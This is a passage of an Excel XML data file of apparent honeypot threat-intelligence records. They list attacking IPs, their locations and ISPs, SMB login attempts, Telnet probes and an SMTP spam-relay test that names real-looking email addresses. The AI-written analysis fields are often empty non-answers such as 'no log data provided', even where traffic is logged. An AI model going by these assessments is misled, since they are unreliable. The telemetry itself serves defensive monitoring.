(108.62.106.7,64324)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,65508)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,59960)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,60438)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,65131)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,55206)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,55317)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (108.62.106.7,53292)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6c3e:6a07"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze any activity. _x000a__x000a_The lack of data indicates that there is currently no information available about potential malicious activities detected."/>
    <m/>
  </r>
  <r>
    <x v="239"/>
    <x v="239"/>
    <s v="111-70-15-77.emome-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:12:47"/>
    <d v="2023-12-27T09:14:36"/>
    <d v="2025-04-30T06:12:47"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="22672&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.032"/>
    <s v="121.526"/>
    <s v="17421"/>
    <s v="Mobile Business Group"/>
    <s v="EMOME"/>
    <s v="cellular"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6f46:f4d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity reported yet. Data is empty. No indicators of unauthorized access or suspicious behavior present. &amp;&amp; No log data provided, unable to analyze or describe any activity."/>
    <s v="There is no log data provided to analyze. Please provide the log data for me to identify the types of attacks."/>
  </r>
  <r>
    <x v="240"/>
    <x v="240"/>
    <s v="NA&amp;&amp;syn-066-191-170-220.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-30T06:12:45"/>
    <d v="2025-03-12T12:37:48"/>
    <d v="2025-04-30T06:12:45"/>
    <n v="109"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NC"/>
    <s v="North Carolina"/>
    <s v="Catawba"/>
    <s v="Hickory"/>
    <s v="4470778"/>
    <s v="28602"/>
    <s v="35.6704"/>
    <s v="-81.3619"/>
    <s v="20115"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="None"/>
    <s v="CHARTER-NET-5BLK"/>
    <s v="2012-03-02"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:42bf:aadc"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="Insufficient log data provided to analyze malicious activity. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No log data provided, cannot analyze malicious activity."/>
    <s v="There is no log data provided. Please provide the log data for analysis. _x000a__x000a_(Once you provide the log data, I'll be happy to help analyze it and identify the type of attack based on your instructions.)"/>
  </r>
  <r>
    <x v="241"/>
    <x v="241"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:12:29"/>
    <d v="2024-12-10T22:49:09"/>
    <d v="2025-04-30T06:12:29"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.033"/>
    <s v="73.0297"/>
    <s v="199404"/>
    <s v="WHG Hosting Services Ltd"/>
    <s v="WHG Hosting Services Ltd"/>
    <s v="hosting"/>
    <s v="WHG Hosting Services Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,51987)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,52162)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,50274)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,50344)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,55729)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,56025)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,52845)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,56332)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,51398)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,51549)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,53329)}&amp;&amp;{Data_SMB:Incoming connection (198.38.85.42,55454)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c626:552a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="242"/>
    <x v="242"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:12:16"/>
    <d v="2024-08-03T00:11:00"/>
    <d v="2025-04-30T06:12:16"/>
    <n v="230"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;10108"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="62"/>
    <s v="Lazio"/>
    <s v="Rome"/>
    <s v="Vitinia"/>
    <s v="6698334"/>
    <s v="NA"/>
    <s v="41.7912"/>
    <s v="12.4081"/>
    <s v="8220"/>
    <s v="COLT Technology Services Group Limited"/>
    <s v="COLT Internet IT"/>
    <s v="business"/>
    <s v="Residence Le Torri SpA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d5d7:ea7e"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected, suggesting potential scan or probing attempt to identify service availability. This could be an initial step in launching a more targeted attack. The absence of activity may indicate the system is not visible on the network. &amp;&amp; There is insufficient data provided for analysis._x000a__x000a_No possible malicious activity can be inferred from the given log data. &amp;&amp; No malicious activity detected as TELNET service is not being accessed. &amp;&amp; There is insufficient log data to analyze possible malicious activity. _x000a_The given log data does not indicate any notable events or attempts._x000a_No notable threats or attacks are reported based on this information. &amp;&amp; There is insufficient data to analyze any malicious activity. _x000a_This indicates that either there has been no incident or the monitoring system has yet to detect anything unusual. _x000a_The lack of log data prevents further assessment."/>
    <s v="Port Scan &amp;&amp; I'll need some actual log data to analyze! Please provide it, and I'll be happy to help."/>
  </r>
  <r>
    <x v="243"/>
    <x v="243"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:45"/>
    <d v="2024-11-24T01:10:31"/>
    <d v="2025-04-30T06:11:45"/>
    <n v="161"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H26"/>
    <s v="23&amp;&amp;34074&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Caraguatatuba"/>
    <s v="Caraguatatuba"/>
    <s v="3467081"/>
    <s v="NA"/>
    <s v="-23.6203"/>
    <s v="-45.4131"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b164"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan for open services on the targeted system, likely as a reconnaissance step before launching further attacks. They are trying various protocols and ports to identify vulnerabilities."/>
    <s v=" PortScan"/>
  </r>
  <r>
    <x v="244"/>
    <x v="244"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:36"/>
    <d v="2024-05-17T19:00:48"/>
    <d v="2025-04-30T06:11:36"/>
    <n v="186"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="445&amp;&amp;27376&amp;&amp;23&amp;&amp;15100&amp;&amp;13698&amp;&amp;51593&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Caraguatatuba"/>
    <s v="Caraguatatuba"/>
    <s v="3467081"/>
    <s v="NA"/>
    <s v="-23.6203"/>
    <s v="-45.4131"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;NA&amp;&amp;connection"/>
    <s v="None&amp;&amp;NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b167"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="245"/>
    <x v="245"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:33"/>
    <d v="2025-01-10T07:27:35"/>
    <d v="2025-04-30T06:11:33"/>
    <n v="62"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="PA"/>
    <s v="Pennsylvania"/>
    <s v="Bucks"/>
    <s v="Ivyland"/>
    <s v="5195068"/>
    <s v="NA"/>
    <s v="40.2079"/>
    <s v="-75.0727"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:32c7:5142"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="246"/>
    <x v="246"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:33"/>
    <d v="2024-12-18T19:02:19"/>
    <d v="2025-04-30T06:11:33"/>
    <n v="136"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AZ"/>
    <s v="Azerbaijan"/>
    <s v="BA"/>
    <s v="Baki"/>
    <s v="Baki"/>
    <s v="Baku (Səbail)"/>
    <s v="587084"/>
    <s v="NA"/>
    <s v="40.3728"/>
    <s v="49.8434"/>
    <s v="39232"/>
    <s v="Uninet LLC"/>
    <s v="CityNET"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,57476)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,57598)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,55892)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,56078)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,51288)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,51536)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,59987)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,60638)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,50306)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,54933)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,58939)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,58988)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,59999)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,60055)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,57445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,56457)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,56496)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,51971)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,52088)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,62851)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,62924)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,60990)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,61038)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53206)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53290)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,50634)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,50725)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53802)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53890)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53793)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53859)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,63146)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,63237)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4e6d:3562"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="247"/>
    <x v="247"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T06:11:33"/>
    <d v="2025-04-15T04:12:21"/>
    <d v="2025-04-30T06:11:33"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H47"/>
    <s v="25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="214943"/>
    <s v="Railnet LLC"/>
    <s v="HostPapa"/>
    <s v="hosting"/>
    <s v="Virtualine Technologies"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 14 Apr 2025 15:39:09 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@chartersills.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mrjohnson106@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;micheal.king95@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 